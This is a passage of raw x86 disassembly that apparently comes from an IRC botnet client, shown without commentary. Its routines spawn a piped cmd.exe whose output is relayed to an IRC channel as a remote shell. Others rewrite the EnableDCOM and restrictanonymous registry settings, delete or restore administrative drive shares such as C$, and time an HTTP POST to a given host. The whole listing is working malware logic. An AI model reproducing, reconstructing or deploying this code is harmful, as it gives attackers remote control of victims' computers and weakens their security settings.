xor eax, eax
inc eax
leave
retn
sub_41A6D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A711 proc near ; CODE XREF: sub_41A798+D3�p
; sub_41A798+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_4F32A8
push [ebp+arg_4]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_41A754
push 7D0h
call ds:dword_4F534C ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS_2 ; "PRIVMSG %s :%s\r"
push eax
call sub_41EA60
add esp, 10h
jmp short loc_41A76B
; ---------------------------------------------------------------------------
loc_41A754: ; CODE XREF: sub_41A711+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_18 ; "%s"
push eax
call sub_41EA60
add esp, 0Ch
loc_41A76B: ; CODE XREF: sub_41A711+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
test eax, eax
jg short loc_41A794
call sub_41A6A9
loc_41A794: ; CODE XREF: sub_41A711+7C�j
xor eax, eax
leave
retn
sub_41A711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A798 proc near ; DATA XREF: sub_41A8ED+174�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_4F3270
loc_41A7B0: ; CODE XREF: sub_41A798+79�j
; sub_41A798+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push ds:dword_4F3264
call ds:dword_4F5460 ; PeekNamedPipe
test eax, eax
jz loc_41A87E
cmp [ebp+var_4], edi
jnz short loc_41A813
lea eax, [ebp+var_8]
push eax
push ds:dword_4F3260
call ds:dword_4F545C ; GetExitCodeProcess
test eax, eax
jz short loc_41A809
cmp [ebp+var_8], 103h
jnz loc_41A8A2
loc_41A809: ; CODE XREF: sub_41A798+62�j
push 0Ah
call ds:dword_4F534C ; Sleep
jmp short loc_41A7B0
; ---------------------------------------------------------------------------
loc_41A813: ; CODE XREF: sub_41A798+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41A82A
loc_41A81A: ; CODE XREF: sub_41A798+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_41A878
inc eax
cmp eax, [ebp+var_4]
jb short loc_41A81A
loc_41A82A: ; CODE XREF: sub_41A798+80�j
mov [ebp+var_4], esi
loc_41A82D: ; CODE XREF: sub_41A798+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push ds:dword_4F3264
call ds:off_4F53BC
test eax, eax
jz short loc_41A8CA
lea eax, [ebp+var_20C]
push eax
push ebx
push ds:dword_4F32A4
call sub_41A711
add esp, 0Ch
jmp loc_41A7B0
; ---------------------------------------------------------------------------
loc_41A878: ; CODE XREF: sub_41A798+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41A82D
; ---------------------------------------------------------------------------
loc_41A87E: ; CODE XREF: sub_41A798+45�j
push offset unk_450D10
push ebx
push ds:dword_4F32A4
call sub_41A711
push [ebp+arg_0]
call sub_40B9A7
add esp, 10h
push 1
call ds:dword_4F53A0 ; ExitThread
loc_41A8A2: ; CODE XREF: sub_41A798+6B�j
call sub_41A6A9
push offset unk_450D40
push ebx
push ds:dword_4F32A4
call sub_41A711
push [ebp+arg_0]
call sub_40B9A7
add esp, 10h
push edi
call ds:dword_4F53A0 ; ExitThread
loc_41A8CA: ; CODE XREF: sub_41A798+C3�j
push offset unk_450D68
push ebx
push ds:dword_4F32A4
call sub_41A711
push [ebp+arg_0]
call sub_40B9A7
add esp, 10h
push edi
call ds:dword_4F53A0 ; ExitThread
sub_41A798 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8ED proc near ; CODE XREF: sub_401C87+24C1�p
; sub_4165C7+99�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
push edi
call sub_41A6A9
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe_0 ; "cmd.exe"
push esi
call ds:off_4E3080
test eax, eax
jz loc_41A9E7
lea eax, [ebp+var_1C]
mov edi, ds:dword_4F53D0
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], 1
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41A9E7
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41A9E7
mov edi, ds:dword_4F53CC
push 3
push esi
push esi
push offset dword_4F3268
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_4F53C8 ; DuplicateHandle
test eax, eax
jz short loc_41A9E7
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_41E4B0
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_41E4B0
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_178]
push offset byte_4F32A9
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jnz short loc_41A9EF
loc_41A9E7: ; CODE XREF: sub_41A8ED+2E�j
; sub_41A8ED+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_41AAA1
; ---------------------------------------------------------------------------
loc_41A9EF: ; CODE XREF: sub_41A8ED+F8�j
push [ebp+var_4]
mov edi, ds:off_4F533C
call edi ; sub_50B3D5
mov eax, [ebp+var_10]
push [ebp+var_28]
mov ds:dword_4F3264, eax
mov eax, [ebp+var_8]
mov ds:dword_4F326C, eax
mov eax, [ebp+var_2C]
mov ds:dword_4F3260, eax
call edi ; sub_50B3D5
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov ds:dword_4F32A4, eax
jz short loc_41AA29
push [ebp+arg_4]
jmp short loc_41AA2E
; ---------------------------------------------------------------------------
loc_41AA29: ; CODE XREF: sub_41A8ED+135�j
push offset word_4F32AA
loc_41AA2E: ; CODE XREF: sub_41A8ED+13A�j
push offset dword_4F3270
call sub_41EA60
pop ecx
pop ecx
push esi
push 0Ah
push offset unk_450DA0
call sub_40B691
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov ds:dword_455F08[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41A798
push esi
push esi
call ds:dword_4F5350 ; CreateThread
cmp eax, esi
mov ds:dword_455F14[edi], eax
jnz short loc_41AA9F
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset unk_450DC4
push eax
call sub_41EA60
lea eax, [ebp+var_378]
push eax
call sub_415A3C
add esp, 10h
loc_41AA9F: ; CODE XREF: sub_41A8ED+189�j
xor eax, eax
loc_41AAA1: ; CODE XREF: sub_41A8ED+FD�j
pop edi
pop esi
leave
retn
sub_41A8ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AAA5 proc near ; DATA XREF: sub_401C87+2E02�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_41AAEC
call sub_41AB05
jmp short loc_41AAF1
; ---------------------------------------------------------------------------
loc_41AAEC: ; CODE XREF: sub_41AAA5+3E�j
call sub_41AE2B
loc_41AAF1: ; CODE XREF: sub_41AAA5+45�j
add esp, 10h
push [ebp+var_14]
call sub_40B9A7
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_41AAA5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB05 proc near ; CODE XREF: sub_41AAA5+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_4E3094, edi
jnz loc_41AC37
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_4E3038 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AB90
mov ax, ds:word_450E38
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_4E2FEC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_41AB78
push offset dword_450E48
jmp short loc_41AB7D
; ---------------------------------------------------------------------------
loc_41AB78: ; CODE XREF: sub_41AB05+6A�j
push offset dword_450E6C
loc_41AB7D: ; CODE XREF: sub_41AB05+71�j
push eax
call sub_41EA60
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4E2FA4 ; RegCloseKey
jmp short loc_41ABA3
; ---------------------------------------------------------------------------
loc_41AB90: ; CODE XREF: sub_41AB05+36�j
lea eax, [ebp+var_214]
push offset dword_450E8C
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41ABA3: ; CODE XREF: sub_41AB05+89�j
cmp [ebp+arg_C], edi
jnz short loc_41ABC2
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41ABC2: ; CODE XREF: sub_41AB05+A1�j
lea eax, [ebp+var_214]
push eax
call sub_415A3C
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_4E3038 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AC30
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call ds:dword_4E2FEC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_41AC18
push offset dword_450ED0
jmp short loc_41AC1D
; ---------------------------------------------------------------------------
loc_41AC18: ; CODE XREF: sub_41AB05+10A�j
push offset dword_450F0C
loc_41AC1D: ; CODE XREF: sub_41AB05+111�j
push eax
call sub_41EA60
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4E2FA4 ; RegCloseKey
jmp short loc_41AC4A
; ---------------------------------------------------------------------------
loc_41AC30: ; CODE XREF: sub_41AB05+E2�j
push offset dword_450F40
jmp short loc_41AC3C
; ---------------------------------------------------------------------------
loc_41AC37: ; CODE XREF: sub_41AB05+13�j
push offset dword_450F7C
loc_41AC3C: ; CODE XREF: sub_41AB05+130�j
lea eax, [ebp+var_214]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41AC4A: ; CODE XREF: sub_41AB05+129�j
cmp [ebp+arg_C], edi
jnz short loc_41AC69
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41AC69: ; CODE XREF: sub_41AB05+148�j
lea eax, [ebp+var_214]
push eax
call sub_415A3C
cmp ds:dword_4E30BC, edi
pop ecx
jnz loc_41ADE6
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41AC8C: ; CODE XREF: sub_41AB05+2C5�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call ds:dword_4E2F0C
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41AD2B
cmp eax, 0EAh
jz short loc_41AD2B
xor esi, esi
loc_41ACBA: ; CODE XREF: sub_41AB05+21F�j
push ds:off_450E18[esi]
push edi
call sub_419909
pop ecx
pop ecx
push ds:off_450E18[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_41ACDF
push offset dword_450FAC
jmp short loc_41ACE4
; ---------------------------------------------------------------------------
loc_41ACDF: ; CODE XREF: sub_41AB05+1D1�j
push offset dword_450FD0
loc_41ACE4: ; CODE XREF: sub_41AB05+1D8�j
push 200h
push eax
call sub_41EC30
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41AD11
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41AD11: ; CODE XREF: sub_41AB05+1F0�j
lea eax, [ebp+var_214]
push eax
call sub_415A3C
add esi, 8
pop ecx
cmp esi, 20h
jb short loc_41ACBA
jmp loc_41ADC3
; ---------------------------------------------------------------------------
loc_41AD2B: ; CODE XREF: sub_41AB05+1AA�j
; sub_41AB05+1B1�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_41ADBA
loc_41AD3A: ; CODE XREF: sub_41AB05+2B1�j
mov edi, [esi]
push edi
call sub_421E60
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41ADAF
push edi
call sub_4197F6
push eax
push 0
call sub_419909
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_41AD6F
push offset dword_450FFC
jmp short loc_41AD74
; ---------------------------------------------------------------------------
loc_41AD6F: ; CODE XREF: sub_41AB05+261�j
push offset dword_451020
loc_41AD74: ; CODE XREF: sub_41AB05+268�j
push 200h
push eax
call sub_41EC30
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41ADA2
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41ADA2: ; CODE XREF: sub_41AB05+281�j
lea eax, [ebp+var_214]
push eax
call sub_415A3C
pop ecx
loc_41ADAF: ; CODE XREF: sub_41AB05+244�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41AD3A
xor edi, edi
loc_41ADBA: ; CODE XREF: sub_41AB05+22F�j
push [ebp+var_8]
call ds:dword_4E3058
loc_41ADC3: ; CODE XREF: sub_41AB05+221�j
cmp [ebp+var_10], 0EAh
jz loc_41AC8C
lea eax, [ebp+var_214]
push offset dword_45104C
push eax
call sub_41EA60
pop ecx
pop ecx
pop ebx
jmp short loc_41ADF9
; ---------------------------------------------------------------------------
loc_41ADE6: ; CODE XREF: sub_41AB05+177�j
lea eax, [ebp+var_214]
push offset dword_451074
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41ADF9: ; CODE XREF: sub_41AB05+2DF�j
cmp [ebp+arg_C], edi
jnz short loc_41AE17
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41AE17: ; CODE XREF: sub_41AB05+2F7�j
lea eax, [ebp+var_214]
push eax
call sub_415A3C
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_41AB05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE2B proc near ; CODE XREF: sub_41AAA5:loc_41AAEC�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push esi
push edi
xor edi, edi
cmp ds:dword_4E3094, edi
jnz loc_41AF59
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_4E3038 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AEB6
mov ax, ds:word_4510A4
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom_0 ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_4E2FEC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_41AE9E
push offset dword_4510B4
jmp short loc_41AEA3
; ---------------------------------------------------------------------------
loc_41AE9E: ; CODE XREF: sub_41AE2B+6A�j
push offset dword_4510D8
loc_41AEA3: ; CODE XREF: sub_41AE2B+71�j
push eax
call sub_41EA60
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4E2FA4 ; RegCloseKey
jmp short loc_41AEC9
; ---------------------------------------------------------------------------
loc_41AEB6: ; CODE XREF: sub_41AE2B+36�j
lea eax, [ebp+var_220]
push offset dword_4510F4
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41AEC9: ; CODE XREF: sub_41AE2B+89�j
cmp [ebp+arg_C], edi
jnz short loc_41AEE8
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41AEE8: ; CODE XREF: sub_41AE2B+A1�j
lea eax, [ebp+var_220]
push eax
call sub_415A3C
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_4E3038 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AF52
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanon_0 ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], edi
call ds:dword_4E2FEC ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_41AF3A
push offset dword_451138
jmp short loc_41AF3F
; ---------------------------------------------------------------------------
loc_41AF3A: ; CODE XREF: sub_41AE2B+106�j
push offset dword_451178
loc_41AF3F: ; CODE XREF: sub_41AE2B+10D�j
push eax
call sub_41EA60
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4E2FA4 ; RegCloseKey
jmp short loc_41AF6C
; ---------------------------------------------------------------------------
loc_41AF52: ; CODE XREF: sub_41AE2B+E2�j
push offset dword_4511B0
jmp short loc_41AF5E
; ---------------------------------------------------------------------------
loc_41AF59: ; CODE XREF: sub_41AE2B+13�j
push offset dword_4511EC
loc_41AF5E: ; CODE XREF: sub_41AE2B+12C�j
lea eax, [ebp+var_220]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41AF6C: ; CODE XREF: sub_41AE2B+125�j
cmp [ebp+arg_C], edi
jnz short loc_41AF8B
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41AF8B: ; CODE XREF: sub_41AE2B+144�j
lea eax, [ebp+var_220]
push eax
call sub_415A3C
cmp ds:dword_4E30BC, edi
pop ecx
jnz loc_41B102
xor esi, esi
loc_41AFA6: ; CODE XREF: sub_41AE2B+1EC�j
push ds:dword_450E1C[esi]
push ds:off_450E18[esi]
push edi
call sub_41985D
add esp, 0Ch
push ds:off_450E18[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_41AFD2
push offset dword_45121C
jmp short loc_41AFD7
; ---------------------------------------------------------------------------
loc_41AFD2: ; CODE XREF: sub_41AE2B+19E�j
push offset dword_45123C
loc_41AFD7: ; CODE XREF: sub_41AE2B+1A5�j
push 200h
push eax
call sub_41EC30
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41B004
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41B004: ; CODE XREF: sub_41AE2B+1BD�j
lea eax, [ebp+var_220]
push eax
call sub_415A3C
add esi, 8
pop ecx
cmp esi, 10h
jb short loc_41AFA6
push ebx
call ds:dword_4F5464 ; GetLogicalDrives
mov edi, eax
mov bl, 41h
test edi, edi
jz loc_41B0EA
loc_41B02C: ; CODE XREF: sub_41AE2B+2B9�j
mov eax, edi
and eax, 1
cmp al, 1
jnz loc_41B0E0
cmp bl, 41h
jz loc_41B0E0
movsx esi, bl
push esi
push offset aC_2 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41EC30
push esi
push offset aC_3 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_41EC30
add esp, 20h
lea eax, [ebp+var_20]
push eax
call ds:dword_4E3028 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41B0E0
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_41985D
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_41B0A0
push offset dword_451270
jmp short loc_41B0A5
; ---------------------------------------------------------------------------
loc_41B0A0: ; CODE XREF: sub_41AE2B+26C�j
push offset dword_451290
loc_41B0A5: ; CODE XREF: sub_41AE2B+273�j
push 200h
push eax
call sub_41EC30
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41B0D3
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41B0D3: ; CODE XREF: sub_41AE2B+28C�j
lea eax, [ebp+var_220]
push eax
call sub_415A3C
pop ecx
loc_41B0E0: ; CODE XREF: sub_41AE2B+208�j
; sub_41AE2B+211�j ...
inc bl
shr edi, 1
jnz loc_41B02C
loc_41B0EA: ; CODE XREF: sub_41AE2B+1FB�j
lea eax, [ebp+var_220]
push offset dword_4512B8
push eax
call sub_41EA60
pop ecx
xor edi, edi
pop ecx
pop ebx
jmp short loc_41B115
; ---------------------------------------------------------------------------
loc_41B102: ; CODE XREF: sub_41AE2B+173�j
lea eax, [ebp+var_220]
push offset dword_4512DC
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41B115: ; CODE XREF: sub_41AE2B+2D5�j
cmp [ebp+arg_C], edi
jnz short loc_41B133
push edi
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_41B133: ; CODE XREF: sub_41AE2B+2ED�j
lea eax, [ebp+var_220]
push eax
call sub_415A3C
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_41AE2B endp
; =============== S U B R O U T I N E =======================================
sub_41B147 proc near ; CODE XREF: sub_41B33E+CB�p
; sub_41B33E+DD�p ...
arg_0 = dword ptr 4
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
call sub_41EB70
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41B147 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B161 proc near ; CODE XREF: sub_41B33E+D4�p
; sub_41B33E+E6�p ...
var_38 = dword ptr -38h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41BC70
mov esi, 0FFh
pop ecx
cmp eax, esi
ja loc_41B33A
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_41E4B0
push [ebp+arg_0]
mov [ebp+var_28], 2
call sub_40AD91
add esp, 10h
mov [ebp+var_24], eax
test eax, eax
jz loc_41B33A
push 50h
call ds:dword_4E2FC8 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call ds:dword_4E3048 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41B33A
lea ecx, [ebp+var_28]
push 10h
push ecx
push eax
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jz loc_41B33A
push 32003h
call sub_420C30
mov edi, ds:dword_4F537C
mov ebx, eax
pop ecx
mov [ebp+var_8], ebx
call edi ; GetTickCount
push eax
call sub_41EB60
call sub_41EB70
cdq
idiv esi
mov [esp+38h+var_38], 32001h
push 0
push ebx
movsx esi, dl
call sub_41E4B0
push 32000h
push esi
push ebx
call sub_41E4B0
push ebx
call sub_41BC70
push 323EAh
mov ebx, eax
call sub_420C30
push ebx
mov esi, eax
push [ebp+arg_0]
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi
call sub_41EA60
push [ebp+var_8]
push esi
call sub_41F630
push offset asc_451344 ; "\r\n"
push esi
call sub_41F630
add esp, 40h
push esi
call sub_41BC70
mov ebx, eax
pop ecx
mov [ebp+var_10], ebx
call edi ; GetTickCount
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test ebx, ebx
mov [ebp+arg_0], eax
jbe short loc_41B2B8
mov [ebp+var_C], ebx
mov ebx, 400h
jmp short loc_41B288
; ---------------------------------------------------------------------------
loc_41B285: ; CODE XREF: sub_41B161+155�j
mov eax, [ebp+arg_0]
loc_41B288: ; CODE XREF: sub_41B161+122�j
mov ecx, [ebp+var_10]
push 0
sub ecx, eax
add eax, esi
cmp ecx, ebx
jnb short loc_41B29A
push [ebp+var_C]
jmp short loc_41B29B
; ---------------------------------------------------------------------------
loc_41B29A: ; CODE XREF: sub_41B161+132�j
push ebx
loc_41B29B: ; CODE XREF: sub_41B161+137�j
push eax
push [ebp+var_4]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41B321
add [ebp+arg_0], ebx
sub [ebp+var_C], ebx
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_10]
jb short loc_41B285
loc_41B2B8: ; CODE XREF: sub_41B161+118�j
call edi ; GetTickCount
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul ds:flt_43C4F4
fst [ebp+arg_0]
fcomp ds:flt_43C4F0
fnstsw ax
test ah, 44h
jp short loc_41B2E2
fld1
fstp [ebp+arg_0]
loc_41B2E2: ; CODE XREF: sub_41B161+17A�j
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
push [ebp+var_8]
call sub_41C9D0
push esi
call sub_41C9D0
mov eax, [ebp+var_10]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+arg_0]
fmul ds:flt_43C4EC
fmul ds:flt_43C4E8
call sub_4201DC
loc_41B31C: ; CODE XREF: sub_41B161+1DB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41B321: ; CODE XREF: sub_41B161+147�j
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
push [ebp+var_8]
call sub_41C9D0
push esi
call sub_41C9D0
pop ecx
pop ecx
loc_41B33A: ; CODE XREF: sub_41B161+19�j
; sub_41B161+42�j ...
xor eax, eax
jmp short loc_41B31C
sub_41B161 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B33E proc near ; CODE XREF: sub_401C87+2E57�p
var_26C = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
